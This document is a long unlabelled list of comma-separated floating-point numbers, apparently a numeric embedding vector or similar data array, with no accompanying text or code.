0.003703527385368943, 0.030552295967936516, 0.0001987577707041055, -0.02138371951878071, -0.01910240389406681, -0.01868368126451969, 0.032111674547195435, 0.027260271832346916, 0.01115389820188284, -0.01022260170429945, 0.004992181435227394, 0.008843705989420414, -0.03112984448671341, -0.022553253918886185, 0.013796181418001652, -0.020416326820850372, 0.0524124912917614, -0.00662375520914793, -0.025498749688267708, -0.02002648077905178, 0.028415368869900703, -0.000026466255803825334, -0.0030050550121814013, 0.006836725864559412, 0.06497416645288467, -0.0030808583833277225, -0.000593340490013361, -0.016777772456407547, 0.028068838641047478, -0.030985457822680473, 0.015232832171022892, 0.024704622104763985, 0.01940561644732952, -0.01819276623427868, -0.023852737620472908, -0.018048379570245743, -0.007414273917675018, -0.022870905697345734, -0.018409347161650658, 0.0015314050251618028, 0.028834089636802673, 0.012561671435832977, 0.004331611096858978, 0.01139935664832592, 0.00018860556883737445, 0.02217784896492958, -0.01074239518493414, -0.03670318424701691, -0.03326677158474922, -0.006854774430394173, 0.04395141452550888, -0.052845653146505356, 0.014099393971264362, 0.02168693207204342, -0.010489718057215214, 0.016315734013915062, -0.032718103379011154, -0.008432202972471714, 0.007666951511055231, -0.0236072801053524, 0.005277345888316631, 0.008092893287539482, -0.022120093926787376, 0.04141020029783249, -0.02661053091287613, -0.013341361656785011, 0.034970540553331375, -0.017846237868070602, -0.04013959690928459, 0.0017705459613353014, 0.011283846572041512, 0.0028317905962467194, -0.016517875716090202, 0.005241249222308397, 0.00019097441690973938, 0.005836845841258764, -0.0036475774832069874, -0.0009155040024779737, -0.016864405944943428, 0.002544821472838521, -0.01478523202240467, 0.04343162104487419, -0.03638553246855736, 0.016301296651363373, 0.023693911731243134, -0.008749853819608688, -0.04068826511502266, -0.018351592123508453, 0.021744687110185623, 0.00837444793432951, 0.011883052997291088, 0.002923837397247553, 0.04444232955574989, 0.010309234261512756, 0.014539774507284164, 0.054087381809949875, -0.01786067523062229, -0.01848153956234455, 0.012749374844133854, 0.00598484231159091, 0.009024189785122871, 0.012547233141958714, 0.01052581425756216, 0.012128510512411594, -0.046579256653785706, -0.012482259422540665, -0.008749853819608688, 0.003761282190680504, 0.04478885605931282, -0.021311525255441666, -0.028415368869900703, -0.0003939058806281537, -0.01878475211560726, -0.007565880659967661, -0.0030014454387128353, -0.029411638155579567, -0.007028038613498211, -0.013341361656785011, 0.038464706391096115, 0.027895575389266014, 0.007172425743192434, -0.013796181418001652, -0.0253832396119833, 0.004392975475639105, 0.0030862728599458933, -0.010886781848967075, -0.026682723313570023, -0.024834569543600082, 0.0004800868919119239, 0.0008622613386251032, 0.0007887141546234488, -0.006497416645288467, 0.01736976020038128, 0.0010820003226399422, -0.010792930610477924, 0.015983644872903824, 0.005360368639230728, -0.005024668760597706, 0.01786067523062229, 0.05053546279668808, 0.04501987621188164, 0.0005816090269945562, -0.017586341127753258, -0.019492249935865402, -0.0055119749158620834, -0.004436291754245758, -0.0004363195621408522, 0.027072569355368614, -0.014525335282087326, -0.021802442148327827, 0.026437265798449516, 0.0009448326309211552, 0.0023354601580649614, 0.0017443757969886065, -0.021542545408010483, -0.003584408201277256, 0.007053306791931391, 0.015839258208870888, -0.019867654889822006, -0.007731925696134567, 0.013464090414345264, -0.019290108233690262, 0.028184348717331886, -0.00836722832173109, 0.0018535684794187546, -0.005815187934786081, 0.010208163410425186, 0.011854175478219986, -0.0011875833151862025, -0.024675743654370308, 0.014431484043598175, 0.011818078346550465, -0.025022272020578384, 0.005313443019986153, 0.02268320322036743, 0.03341116011142731, 0.024733498692512512, 0.011262188665568829, -0.02105162851512432, 0.020373011007905006, 0.015954766422510147, -0.01859704963862896, -0.031100966036319733, -0.02207677811384201, -0.005724946036934853, -0.01644568331539631, 0.01438816823065281, 0.021831318736076355, 0.019665513187646866, -0.003396705025807023, 0.01248947810381651, 0.04037061333656311, 0.021917952224612236, -0.02138371951878071, -0.0027271101716905832, -0.05145953968167305, 0.03546145558357239, -0.02486344799399376, -0.017745167016983032, -0.00846829917281866, -0.008049577474594116, -0.001929371734149754, 0.011125020682811737, -0.02207677811384201, -0.013442432507872581, -0.04187224060297012, -0.029426077380776405, -0.007565880659967661, -0.025599820539355278, 0.013175317086279392, 0.020271940156817436, -0.012604988180100918, 0.0078113386407494545, -0.00683311652392149, -0.043489374220371246, -0.009551201947033405, -0.0023192167282104492, -0.04213213548064232, 0.011435452848672867, -0.038147054612636566, 0.0073493001982569695, 0.0038659628480672836, 0.001810252433642745, -0.01490074209868908, 0.015752624720335007, -0.021831318736076355, -0.00537119759246707, -0.002044881461188197, -0.0260762982070446, -0.022322235628962517, 0.004465168807655573, -0.02783782035112381, -0.014669722877442837, 0.006713997106999159, 0.027577923610806465, 0.029252812266349792, -0.0037396240513771772, -0.005631094332784414, 0.00858380924910307, 0.013904470950365067, -0.02258213236927986, 0.020488519221544266, 0.005605826620012522, 0.010915659368038177, 0.02095055766403675, 0.02125377207994461, 0.04704129695892334, 0.015897013247013092, -0.01570930890738964, 0.025397678837180138, -0.03523043543100357, -0.008193964138627052, 0.009125260636210442, 0.03514380380511284, -0.03061005100607872, -0.021600300446152687, 0.01622910238802433, 0.035576965659856796, -0.015362780541181564, -0.019376739859580994, 0.03173626959323883, 0.0059740133583545685, 0.013240290805697441, -0.028733018785715103, 0.01817832700908184, 0.009464570321142673, 0.026437265798449516, -0.0031638809014111757, 0.008757073432207108, 0.011067265644669533, -0.017687411978840828, 0.02587415650486946, 0.0014294316060841084, -0.028068838641047478, -0.02619180828332901, 0.012864884920418262, -0.0006524489144794643, -0.00314763723872602, -0.054289523512125015, -0.01878475211560726, 0.016777772456407547, -0.02083504945039749, -0.023780545219779015, 0.012994833290576935, 0.022206725552678108, -0.020401887595653534, 0.02568645402789116, -0.02178800292313099, -0.0006944113993085921, -0.006591267883777618, 0.009067505598068237, -0.01960776001214981, 0.013132000342011452, -0.012301775626838207, 0.0011153898667544127, 0.007970164529979229, -0.005154617130756378, 0.005194323603063822, 0.0003573579015210271, 0.020474081858992577, -0.00991938915103674, 0.033237896859645844, 0.020459642633795738, -0.01816388964653015, -0.0034743130672723055, 0.005844064988195896, -0.006093132775276899, -0.01683552749454975, -0.00031336498796008527, 0.036847569048404694, -0.005847674794495106, 0.030638927593827248, 0.024170389398932457, -0.028617510572075844, -0.017196495085954666, -0.027852259576320648, 0.016185786575078964, -0.013399116694927216, 0.036818694323301315, 0.011377697810530663, 0.018958017230033875, -0.019665513187646866, 0.032804735004901886, -0.008230061270296574, 0.006843945477157831, 0.0020593199878931046, 0.012063536792993546, -0.008432202972471714, -0.017947308719158173, -0.03268922492861748, -0.012359529733657837, 0.00032735246350057423, -0.015969205647706985, 0.047416701912879944, 0.022148970514535904, 0.005501145962625742, 0.009753343649208546, -0.013832277618348598, -0.000010666874004527926, 0.03652992099523544, -0.007703048177063465, 0.006428832653909922, -0.013427994213998318, 0.025599820539355278, 0.013897252269089222, -0.01624354161322117, -0.03193841129541397, 0.015998084098100662, -0.0030844679567962885, -0.012056317180395126, -0.05841899290680885, -0.008735415525734425, -0.015261709690093994, 0.025946350768208504, -0.013651793822646141, 0.04660813510417938, 0.0003602907818276435, 0.011926368810236454, 0.014409826137125492, -0.02056071348488331, -0.011312724091112614, 0.006836725864559412, 0.0044904365204274654, -0.012619426473975182, 0.006977503187954426, -0.05558900907635689, 0.00258272304199636, 0.011897491291165352, -0.05498258396983147, 0.01300205197185278, -0.03762726113200188, -0.0007932262378744781, -0.015492728911340237, -0.003144027665257454, -0.02331850491464138, -0.024531356990337372, -0.039908576756715775, 0.02084948681294918, 0.014258219860494137, 0.008432202972471714, 0.003797378856688738, -0.006302494090050459, 0.00960895698517561, -0.019463371485471725, -0.007042477373033762, -0.03563471883535385, -0.03647216409444809, -0.018755875527858734, 0.020777294412255287, 0.04475998133420944, 0.015954766422510147, -0.00536758778616786, 0.009255209006369114, 0.027794504538178444, 0.014265438541769981, -0.015189515426754951, -0.022986415773630142, 0.006075084209442139, 0.0038984499406069517, -0.025542065501213074, 0.013651793822646141, 0.014713038690388203, 0.05948745831847191, 0.012684401124715805, 0.01570930890738964, -0.028631947934627533, -0.0187991913408041, -0.0013617501826956868, -0.012027439661324024, -0.013890032656490803, -0.0033949001226574183, -0.012677181512117386, 0.033035751432180405, -0.011522085405886173, 0.0019925411324948072, 0.013543503358960152, -0.01042474340647459, 0.0028083277866244316, -0.00242570205591619, -0.0027253052685409784, 0.0008378960192203522, -0.02535436302423477, -0.03514380380511284, 0.0029130084440112114, -0.006573219783604145, 0.013839497230947018, 0.008944776840507984, 0.004963304381817579, 0.016575630754232407, 0.016257980838418007, -0.013926129788160324, 0.005854894407093525, 0.01396944560110569, -0.01654675416648388, -0.02484900876879692, -0.0029436906334012747, -0.03222718462347984, -0.014597528614103794, 0.014705819077789783, -0.015131761319935322, -0.003250512992963195, -0.04158346727490425, 0.01242450438439846, 0.02487788535654545, 0.0035627500619739294, 0.011875833384692669, -0.006129229441285133, 0.005273736547678709, 0.015536044724285603, -0.03719409927725792, 0.037136346101760864, -0.003228855086490512, -0.02138371951878071, -0.013160877861082554, 0.022336674854159355, 0.02557094395160675, 0.004988572094589472, -0.0408904068171978, 0.028588632121682167, 0.02136928029358387, -0.0260762982070446, -0.005194323603063822, 0.012164607644081116, -0.01890026219189167, -0.009204673580825329, 0.02988811582326889, 0.0018662024522200227, 0.012706059031188488, -0.02639394998550415, -0.0021946828346699476, 0.007165206596255302, 0.004082543309777975, 0.004328001290559769, -0.009796660393476486, -0.0018824459984898567, 0.023896053433418274, -0.04005296155810356, -0.0038876207545399666, 0.01930454559624195, -0.008793170563876629, -0.012742155231535435, -0.022033460438251495, -0.024921201169490814, -0.002339069964364171, -0.014496457763016224, 0.035201556980609894, -0.004999401047825813, -0.03274697810411453, -0.010504156351089478, 0.006237519904971123, 0.01365901343524456, -0.02968597412109375, 0.0130381491035223, -0.03254483640193939, -0.02032969333231449, 0.02528216876089573, 0.0003997716121375561, 0.027678994461894035, 0.0037360144779086113, -0.03473952040076256, 0.042565297335386276, 0.04296958073973656, 0.02682710997760296, -0.02053183689713478, -0.023289628326892853, -0.023968247696757317, -0.01992540992796421, -0.0010116116609424353, 0.037944912910461426, -0.005313443019986153, -0.004281075671315193, 0.014294316060841084, 0.020098675042390823, -0.001289556734263897, 0.00043451471719890833, -0.0028281810227781534, 0.00755144190043211, 0.005475878249853849, -0.021340403705835342, 0.026032982394099236, 0.0009105407516472042, -0.012799910269677639, 0.01118999533355236, 0.061393365263938904, -0.002718085888773203, 0.0023282410111278296, 0.02240886725485325, -0.016878843307495117, 0.012821568176150322, 0.009637834504246712, 0.004782820586115122, 0.003120564855635166, -0.01878475211560726, 0.00206653936766088, -0.017283128574490547, 0.03482615202665329, -0.023693911731243134, 0.021499229595065117, -0.011673691682517529, -0.002016003942117095, -0.033324528485536575, -0.014705819077789783, 0.00826615747064352, -0.010727956891059875, -0.014626406133174896, 0.011875833384692669, -0.005252078175544739, -0.009969924576580524, -0.030898824334144592, 0.007645293604582548, 0.013449652120471, 0.021730247884988785, 0.02175912633538246, -0.0032739760354161263, -0.003450850024819374, -0.01787511445581913, -0.011464330367743969, 0.02855975553393364, -0.03401758521795273, -0.0009800270199775696, 0.00367284519597888, 0.008121770806610584, -0.006381907034665346, 0.018308276310563087, -0.0020105894654989243, -0.01973770745098591, 0.019448934122920036, -0.016720019280910492, -0.01838046871125698, -0.02609073743224144, -0.03881123289465904, 0.02311636321246624, 0.006244739051908255, -0.015550483018159866, -0.01817832700908184, -0.009074725210666656, -0.005378417205065489, -0.0019907362293452024, 0.0028949601110070944, 0.011753104627132416, 0.07866205275058746, 0.003174709854647517, 0.01263386569917202, -0.011760324239730835, -0.015637116506695747, -0.009255209006369114, -0.002853448735550046, 0.014301535673439503, 0.020387448370456696, -0.033035751432180405, 0.010829027742147446, 0.007919629104435444, 0.0004383500199764967, 0.004703407641500235, -0.003335340414196253, 0.014438703656196594, -0.019853217527270317, -0.009832756593823433, 0.02650946006178856, -0.01212129183113575, 0.015276147983968258, 0.013644574210047722, 0.005919868126511574, -0.004883891437202692, 0.03603900223970413, -0.002147757215425372, -0.005656362045556307, -0.024488041177392006, -0.04242090880870819, -0.007558661047369242, 0.003124174429103732, 0.009457350708544254, -0.0017488879384472966, -0.009363499470055103, 0.0027253052685409784, 0.0020051749888807535, 0.026783794164657593, 0.021008312702178955, -0.011688129976391792, -0.040226228535175323, -0.020300816744565964, -0.014200464822351933, -0.017918430268764496, -0.0007783363689668477, 0.007262667641043663, 0.0004094725882168859, 0.007638073991984129, -0.001638792804442346, -0.0138611551374197, 0.01139935664832592, -0.009233551099896431, -0.017326444387435913, -0.00023372650321107358, -0.0019943458028137684, 0.006573219783604145, 0.0004554959596134722, -0.017384199425578117, -0.008865363895893097, -0.013695109635591507, 0.011269408278167248, 0.011594278737902641, 0.020199745893478394, -0.01211407221853733, -0.01108892448246479, 0.00872097723186016, -0.0258885957300663, -0.033728811889886856, -0.008295034989714622, -0.001477259793318808, 0.006280835717916489, 0.013796181418001652, 0.003468898357823491, 0.006887261290103197, -0.00023327530652750283, -0.011695349588990211, -0.011067265644669533, -0.012756594456732273, 0.023029731586575508, -0.022567693144083023, -0.029411638155579567, 0.006331371609121561, -0.007941287010908127, 0.01263386569917202, 0.01747083105146885, -0.0024654085282236338, 0.031274233013391495, -0.018755875527858734, -0.025527628138661385, -0.013630135916173458, 0.008388886228203773, -0.014705819077789783, 0.003967033699154854, 0.004746723920106888, 0.0071796453557908535, 0.018568173050880432, 0.02321743406355381, 0.02083504945039749, -0.016503438353538513, -0.01520395465195179, -0.01001324038952589, 0.014958496205508709, -0.0040789335034787655, -0.010078215040266514, -0.005475878249853849, -0.012287336401641369, 0.01052581425756216, 0.007919629104435444, -0.0011587059125304222, -0.005872942507266998, -0.010583569295704365, -0.015074006281793118, -0.009731685742735863, -0.006659851875156164, -0.0245602335780859, -0.01248947810381651, -0.002990616485476494, -0.006046207156032324, -0.022033460438251495, -0.022105654701590538, -0.023910492658615112, -0.015478289686143398, -0.0040428368374705315, 0.00919745396822691, -0.023260751739144325, -0.028270980343222618, 0.006851164624094963, 0.03133198618888855, -0.02721695601940155, 0.02147035114467144, 0.02320299670100212, 0.015738187357783318, 0.009327402338385582, 0.007775241509079933, -0.021542545408010483, 0.004800868686288595, -0.04109254851937294, 0.02435809187591076, 0.012460600584745407, 0.012258458882570267, 0.009998802095651627, -0.011449892073869705, 0.005313443019986153, 0.001366262324154377, 0.013124781660735607, 0.021845757961273193, -0.020358571782708168, 0.00872097723186016, 0.011110582388937473, 0.008663222193717957, 0.01898689568042755, 0.03577910736203194, -0.02505115047097206, 0.003970643505454063, 0.020315255969762802, 0.017817359417676926, -0.015795940533280373, 0.006331371609121561, -0.011226091533899307, -0.006508245598524809, 0.017225373536348343, -0.008699318394064903, 0.013464090414345264, 0.0052701267413794994, -0.01284322701394558, -0.014568652026355267, 0.037858281284570694, -0.011031169444322586, 0.0006948626250959933, -0.021816881373524666, 0.016676701605319977, 0.025238852947950363, -0.0027253052685409784, -0.00662736501544714, 0.002952714916318655, -0.002082783030346036, 0.031591881066560745, -0.0055264136753976345, -0.00253038271330297, 0.033353403210639954, -0.030985457822680473, -0.002476237714290619, 0.010662982240319252, 0.009349060244858265, -0.0042846850119531155, -0.002748768078163266, 0.019651075825095177, 0.004559020511806011, -0.009421253576874733, -0.02884852886199951, 0.008749853819608688, 0.01129106618463993, 0.024069318547844887, -0.019391179084777832, -0.03338228166103363, 0.02321743406355381, -0.031678516417741776, -0.0070316484197974205, -0.03716522082686424, 0.014871864579617977, 0.0074792481027543545, -0.009565641172230244, -0.01601252146065235, -0.018943578004837036, -0.0030989067163318396, -0.0021946828346699476, -0.03834919631481171, -0.01921791397035122, -0.014539774507284164, -0.015117322094738483, 0.009767782874405384, -0.0012011196231469512, -0.030119135975837708, 0.003988691605627537, -0.007291545160114765, 0.014741916209459305, 0.006742874626070261, -0.00006412814400391653, -0.011421014554798603, -0.009897731244564056, 0.01705210842192173, 0.005966794211417437, 0.0024112635292112827, 0.002680184319615364, 0.006656242068856955, -0.0014023591065779328, -0.0019907362293452024, 0.036616552621126175, -0.008713757619261742, 0.004277465865015984, -0.009067505598068237, -0.020878365263342857, -0.004703407641500235, 0.001947420067153871, 0.021239332854747772, -0.009847195819020271, -0.0057466039434075356, 0.005591387860476971, 0.015420535579323769, -0.006764532532542944, -0.0014835767215117812, 0.01365901343524456, 0.000050873870350187644, -0.014315973967313766, 0.0017407662235200405, 0.0018770314054563642, -0.0003503641637507826, 0.0024347263388335705, 0.0196221973747015, -0.002580918138846755, 0.019651075825095177, -0.0031566615216434, 0.012265678495168686, 0.002154976362362504, -0.013586820103228092, -0.0022759006824344397, -0.011392137035727501, -0.0020376620814204216, -0.029093986377120018, -0.005400075111538172, 0.01063410472124815, 0.033555544912815094, -0.010049337521195412, -0.007999042049050331, 0.02580196224153042, -0.02095055766403675, 0.03173626959323883, -0.003077248577028513, -0.017932869493961334, 0.017297565937042236, 0.01469138078391552, 0.005739384796470404, -0.006836725864559412, 0.0021910732612013817, 0.0002700488839764148, -0.0004895622842013836, 0.006937796715646982, 0.012171827256679535, -0.019651075825095177, -0.0053206621669232845, 0.015218392945826054, -0.00485140411183238, 0.028011083602905273, 0.02001204341650009, -0.02056071348488331, 0.006869213189929724, -0.0019185426644980907, -0.04192999377846718, -0.011334381997585297, -0.006562390830367804, 0.0019221523543819785, 0.009175796061754227, 0.0018328129081055522, 0.010691859759390354, -0.025209976360201836, 0.004309952724725008, -0.009587299078702927, -0.0019564442336559296, 0.025022272020578384, 0.01849597878754139, 0.0053206621669232845, -0.000026466255803825334, 0.03326677158474922, 0.017543025314807892, -0.005847674794495106, 0.012150168418884277, -0.013305265456438065, -0.03294911980628967, -0.0015629896661266685, 0.0047106267884373665, 0.009717247448861599, -0.008728195913136005, 0.0002196262066718191, -0.03049454092979431, -0.005291784647852182, 0.006143668200820684, -0.02239442802965641, -0.03081219270825386, 0.012814349494874477, -0.02402600273489952, 0.017716288566589355, -0.00817230623215437, -0.0122151430696249, -0.027260271832346916, -0.014128271490335464, -0.0049163782969117165, -0.009536763653159142, -0.022004583850502968, -0.018135011196136475, -0.02279871329665184, -0.016373489052057266, 0.023058610036969185, -0.0002980238641612232, 0.02568645402789116, -0.022885344922542572, 0.004353269003331661, 0.02617736905813217, 0.01063410472124815, -0.013023710809648037, -0.0026531117036938667, 0.012771032750606537, -0.037540629506111145, 0.027895575389266014, -0.0029653487727046013, 0.007883531972765923, 0.023592840880155563, 0.004927207715809345, 0.006638193968683481, 0.010915659368038177, -0.009118041023612022, -0.02178800292313099, -0.00826615747064352, -0.003743233857676387, 0.0053206621669232845, -0.001674889586865902, 0.008417763747274876, 0.012872103601694107, 0.005992061924189329, -0.0028317905962467194, 0.006991941947489977, -0.027592362836003304, 0.006482977885752916, -0.0017967161256819963, 0.0005861211102455854, 0.026523897424340248, 0.01191193051636219, -0.023665035143494606, -0.020055359229445457, 0.02269764244556427, 0.029137304052710533, -0.0009155040024779737, 0.008287815377116203, -0.022524377331137657, 0.018510418012738228, -0.006161716766655445, 0.008020699955523014, 0.004223320633172989, 0.02887740731239319, -0.028299858793616295, -0.02271207980811596, 0.03627002239227295, -0.00004844861905439757, 0.0007404347416013479, -0.010403085500001907, -0.023592840880155563, 0.006450490560382605, -0.009081944823265076, -0.020719539374113083, -0.0022759006824344397, -0.016676701605319977, -0.0260762982070446, 0.024921201169490814, 0.008424983359873295, 0.018741436302661896, 0.03889786824584007, -0.0040933722630143166, 0.008352790027856827, -0.007508125621825457, 0.014294316060841084, -0.00253038271330297, -0.021629177033901215, 0.006461319513618946, -0.03491278365254402, -0.007053306791931391, 0.023376259952783585, 0.0009592713322490454, 0.003912888467311859, -0.019477810710668564, -0.023665035143494606, 0.032718103379011154, -0.01170256920158863, 0.004613165743649006, 0.00413668854162097, -0.027808941900730133, -0.014778012409806252, -0.011926368810236454, -0.01427987776696682, -0.008800389245152473, 0.01960776001214981, 0.015247270464897156, -0.003283000085502863, 0.0006894480902701616, 0.003555530682206154, -0.020373011007905006, -0.04132356867194176, -0.013586820103228092, -0.026134053245186806, -0.014597528614103794, 0.009457350708544254, -0.001945615280419588, 0.01572374813258648, -0.003658406436443329, -0.002443750621750951, 0.006739264819771051, -0.010894001461565495, 0.014121051877737045, 0.024704622104763985, 0.00232463120482862, -0.0031404178589582443, -0.018871385604143143, 0.025527628138661385, 0.025036711245775223, -0.00035532747278921306, 0.009414034895598888, -0.0026549166068434715, 0.0030465663876384497, 0.009168576449155807, -0.006078694015741348, -0.006991941947489977, 0.0036114805843681097, 0.00755144190043211, 0.008338350802659988, -0.004096982069313526, 0.01777404360473156, 0.015189515426754951, -0.00191312818787992, -0.003194563090801239, 0.00041646635509096086, 0.007464809808880091, -0.005757432896643877, 0.001253459951840341, 0.020185306668281555, -0.019391179084777832, 0.022466622292995453, 0.005890991073101759, 0.006013719830662012, 0.0024311167653650045, 0.01253279484808445, -0.00423414958640933, -0.015882574021816254, -0.008908679708838463, 0.0015512581449002028, -0.008865363895893097, 0.035374823957681656, 0.0030862728599458933, -0.005447000730782747, -0.01653231494128704, -0.02528216876089573, -0.011096143163740635, 0.01530502550303936, 0.006757312919944525, 0.0036367482971400023, 0.017918430268764496, 0.005872942507266998, -0.004400194622576237, 0.003703527385368943, 0.0013554332545027137, -0.018842507153749466, -0.00960895698517561, 0.0291806198656559, 0.0005446098512038589, 0.0010504156816750765, -0.017817359417676926, 0.007883531972765923, 0.004685359075665474, 0.011875833384692669, 0.010172066278755665, 0.008656002581119537, 0.030032502487301826, 0.02279871329665184, -0.002479847287759185, 0.002580918138846755, -0.0040933722630143166, -0.00888702180236578, 0.0017046694410964847, 0.016359051689505577, 0.006872822996228933, -0.0060859136283397675, -0.0042485883459448814, -0.001963663613423705, -0.018308276310563087, 0.003564554965123534, 0.0035663596354424953, -0.01397666521370411, 0.0019041040213778615, -0.015160638839006424, 0.010417524725198746, -0.0010684640146791935, -0.01695103757083416, -0.018625928089022636, -0.009226331487298012, -0.011717007495462894, 0.013067026622593403, 0.01878475211560726, -0.013182535767555237, -0.013023710809648037, 0.00506076542660594, 0.02600410394370556, -0.014229342341423035, -0.010244259610772133, -0.014503677375614643, -0.0018472515512257814, 0.010215383023023605, -0.00253038271330297, -0.007363738492131233, 0.00444351090118289, 0.003241488942876458, 0.024820130318403244, -0.007948506623506546, -0.0023878004867583513, -0.006407174747437239, -0.0013906275853514671, -0.013817839324474335, -0.006291665136814117, 0.023578401654958725, 0.004508485086262226, 0.001136145438067615, 0.01259054895490408, -0.01848153956234455, -0.01438094861805439, 0.015564922243356705, 0.016864405944943428, -0.0025177488569170237, -0.002506919903680682, -0.00899531226605177, -0.004905549343675375, -0.007666951511055231, -0.0009376133093610406, 0.0015747210709378123, -0.005724946036934853, 0.0022325844038277864, -0.019535565748810768, 0.016618948429822922, 0.01900133304297924, 0.018669243901968002, 0.012020220048725605, 0.013774522580206394, 0.0006763630080968142, -0.007295154966413975, -0.0002084587758872658, -0.021513668820261955, 0.004400194622576237, 0.0012688010465353727, -0.010027679614722729, 0.018062816932797432, 0.0033569985534995794, -0.0066201454028487206, 0.019882094115018845, 0.012496697716414928, -0.00724100973457098, 0.004172785207629204, 0.014734696596860886, 0.00786187406629324, -0.014611967839300632, -0.012612207792699337, -0.010590788908302784, -0.0070677450858056545, 0.01129106618463993, -0.006356639321893454, -0.010894001461565495, -0.005335100926458836, 0.010128750465810299, 0.004277465865015984, -0.02884852886199951, 0.01908796653151512, -0.005003010854125023, -0.0034598743077367544, -0.026148492470383644, -0.004158346448093653, 0.01644568331539631, 0.004118639975786209, 0.00786187406629324, 0.017427515238523483, -0.0005243053892627358, -0.00795572530478239, -0.0034364114981144667, -0.0017651314847171307, 0.008764293044805527, -0.006060645915567875, -0.004161956254392862, -0.00836722832173109, 0.007876312360167503, 0.005360368639230728, 0.005555291194468737, -0.0068114581517875195, -0.004494046326726675, -0.033237896859645844, -0.022885344922542572, -0.0023462893441319466, -0.011493207886815071, -0.0326603464782238, 0.004346049856394529, -0.007500906474888325, 0.001454699318856001, 0.004970523528754711, 0.015853695571422577, 0.02063290774822235, -0.015117322094738483, -0.0063638584688305855, -0.0004755747795570642, 0.0122151430696249, 0.016517875716090202, -0.009240769781172276, 0.0028101326897740364, -0.0033209016546607018, -0.005154617130756378, 0.03719409927725792, 0.004425462335348129, 0.0024004343431442976, -0.0212682094424963, -0.001681206515058875, -0.006612926255911589, -0.000601462263148278, -0.018467102199792862, -0.017730727791786194, -0.029772605746984482, 0.008244499564170837, -0.0010666592279449105, -0.018669243901968002, 0.009962704963982105, 0.028328735381364822, -0.01458309032022953, 0.014655283652245998, -0.023997124284505844, 0.00027591458638198674, -0.004642043262720108, -0.008807608857750893, -0.011464330367743969, 0.0061942036263644695, 0.004328001290559769, 0.011016730219125748, 0.008793170563876629, 0.02372279018163681, -0.01067742146551609, 0.01703766919672489, 0.002443750621750951, -0.005107691511511803, -0.026220684871077538, -0.008511615917086601, 0.0040067401714622974, 0.022538816556334496, 0.004963304381817579, -0.007537003140896559, -0.01755746267735958, 0.0030014454387128353, -0.009349060244858265, -0.026653846725821495, -0.002956324489787221, 0.011319943703711033, -0.013745645992457867, 0.0031855388078838587, -0.0033100727014243603, 0.006533513311296701, 0.00402839807793498, 0.010590788908302784, -0.0025177488569170237, -0.015579360537230968, -0.008540493436157703, 0.0010215382790192962, -0.009016970172524452, 0.0009177600732073188, 0.01273493655025959, 0.005623874720185995, 0.0244302861392498, -0.016488999128341675, 0.003658406436443329, -0.033930953592061996, 0.007186864502727985, 0.017903992906212807, -0.02404044009745121, 0.006360248662531376, 0.020676223561167717, -0.01799062453210354, 0.007739144843071699, -0.015795940533280373, -0.013016491197049618, 0.013615697622299194, -0.005125739611685276, 0.0244302861392498, 0.01242450438439846, -0.0018138621235266328, 0.02382386103272438, -0.00012893311213701963, 0.019882094115018845, -0.005223201122134924, -0.021441474556922913, 0.03439299017190933, 0.0034273872151970863, 0.014676941558718681, 0.01786067523062229, -0.012908200733363628, -0.025744207203388214, -0.0038370853289961815, 0.003974253311753273, -0.017716288566589355, 0.00264408765360713, 0.0017182057490572333, 0.012980394065380096, -0.017312005162239075, -0.022351112216711044, 0.00019672732742037624, 0.02001204341650009, 0.006353029515594244, 0.030956579372286797, -0.0027722311206161976, -0.000020078821762581356, -0.010865123942494392, 0.009580079466104507, -0.021239332854747772, -0.008627125062048435, 0.00858380924910307, 0.021340403705835342, 0.01129828579723835, -0.021701371297240257, 0.01622910238802433, 0.0008636149577796459, 0.010374207980930805, -0.007309593725949526, 0.014337632805109024, -0.007028038613498211, 0.008533273823559284, -0.025426557287573814, 0.017745167016983032, -0.01196968462318182, -0.0059740133583545685, 0.02165805548429489, -0.01098785363137722, -0.011370479129254818, 0.019073527306318283, -0.00909638311713934, -0.0012354115024209023, 0.013276387937366962, 0.008735415525734425, 0.01243172399699688, 0.029007354751229286, 0.03182290121912956, 0.025960788130760193, 0.00944291241466999, -0.006926967762410641, -0.013009271584451199, -0.017182057723402977, 0.01181085966527462, 0.014929619617760181, 0.03491278365254402, 0.004075324162840843, -0.0028426197823137045, 0.012041878886520863, -0.007161596789956093, -0.022466622292995453, 0.014157149009406567, -0.014799671247601509, -0.0047250655479729176, 0.0010034898295998573, -0.023910492658615112, 0.005706897471100092, 0.049264855682849884, 0.004392975475639105, -0.00878595095127821, -0.0007787875365465879, -0.0002657623845152557, -0.011522085405886173, -0.004559020511806011, -0.008280596695840359, 0.008208402432501316, -0.009731685742735863, -0.01673445664346218, -0.012749374844133854, 0.0002833595499396324, 0.004328001290559769, 0.007374567911028862, -0.010359769687056541, -0.0029870066791772842, -0.053365446627140045, -0.03982194513082504, 0.0039056693203747272, 0.023260751739144325, 0.012547233141958714, -0.004580678418278694, 0.0022759006824344397, -0.007248228881508112, -0.0072157420217990875, -0.024372531101107597, 0.0009367108577862382, -0.024314776062965393, 0.003553725779056549, 0.008352790027856827, -0.0007273496594280005, 0.0018039355054497719, -0.0062303002923727036, 0.03889786824584007, -0.007183254696428776, 0.0032198308035731316, -0.026249563321471214, 0.002441945718601346, -0.00745037104934454, -0.007125500123947859, -0.008533273823559284, -0.00355914025567472, -0.012251240201294422, -0.00042007601587101817, -0.014251000247895718, -0.01166647206991911, 0.0073493001982569695, 0.024589112028479576, -0.013947787694633007, -0.00939959567040205, -0.009370718151330948, -0.011991343460977077, -0.014034419320523739, -0.0030610051471740007, -0.006598487496376038, -0.0030339325312525034, -0.000892041134648025, 0.017817359417676926, 0.005764652509242296, -0.021802442148327827, -0.011875833384692669, -0.010540253482758999, -0.013081464916467667, -0.0011325357481837273, -0.01073517557233572, 0.0072013032622635365, 0.001766033936291933, -0.022784274071455002, 0.0014673331752419472, 0.0005477683153003454, 0.004158346448093653, 0.006201423238962889, -0.020069798454642296, -0.020315255969762802, -0.009031408466398716, 0.01002046000212431, 0.012857665307819843, 0.01273493655025959, -0.005844064988195896, 0.00464926240965724, -0.018553733825683594, 0.0020087845623493195, -0.012886542826890945, -0.01222236268222332, -0.025946350768208504, 0.02362171933054924, 0.007970164529979229, -0.009724467061460018, 0.02775118686258793, 0.010619666427373886, 0.005497536156326532, -0.0021080507431179285, -0.004421852994710207, -0.034277480095624924, -0.00191312818787992, 0.011132240295410156, -0.012850445695221424, -0.023794982582330704, 0.01693659834563732, -0.00032870611175894737, -0.007890751585364342, 0.015954766422510147, 0.010179285891354084, 0.00010484980157343671, -0.016864405944943428, -0.010547473095357418, 0.0037685015704482794, -0.022047899663448334, 0.02239442802965641, 0.037020836025476456, 0.012821568176150322, 